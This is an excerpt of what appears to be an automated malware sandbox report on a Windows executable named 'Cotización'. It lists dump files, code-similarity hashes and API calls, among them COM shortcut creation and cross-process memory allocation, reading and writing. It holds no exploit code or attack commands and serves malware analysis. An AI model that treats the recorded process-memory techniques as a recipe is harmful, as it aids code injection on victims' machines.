                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                • API String ID: 2875609808-0
                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                APIs
                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                • MessageBeep.USER32(00000000), ref: 00460C46
                • KillTimer.USER32(?,0000040A), ref: 00460C68
                • EndDialog.USER32(?,00000001), ref: 00460C83
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$Icon
                • String ID:
                • API String ID: 4023252218-0
                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                APIs
                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DeleteDestroyObject$IconMessageSendWindow
                • String ID:
                • API String ID: 1489400265-0
                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                APIs
                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                • DestroyWindow.USER32(?), ref: 00455728
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                • String ID:
                • API String ID: 1042038666-0
                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                APIs
                • __getptd.LIBCMT ref: 0041780F
                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                • __getptd.LIBCMT ref: 00417826
                • __amsg_exit.LIBCMT ref: 00417834
                • __lock.LIBCMT ref: 00417844
                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                APIs
                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                • ExitThread.KERNEL32 ref: 00413D4E
                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                • __freefls@4.LIBCMT ref: 00413D74
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                • String ID:
                • API String ID: 2403457894-0
                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                APIs
                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                • ExitThread.KERNEL32 ref: 004151ED
                • __freefls@4.LIBCMT ref: 00415209
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                • String ID:
                • API String ID: 4247068974-0
                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: )$U$\
                • API String ID: 0-3705770531
                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                APIs
                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                • CoInitialize.OLE32(00000000), ref: 0046E505
                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                • CoUninitialize.OLE32 ref: 0046E53D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                Strings
                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                • API String ID: 708495834-557222456
                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                APIs
                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                • CoInitialize.OLE32(00000000), ref: 00478442
                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                • CoUninitialize.OLE32 ref: 0047863C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                APIs
                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                • API String ID: 4150878124-2766056989
                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
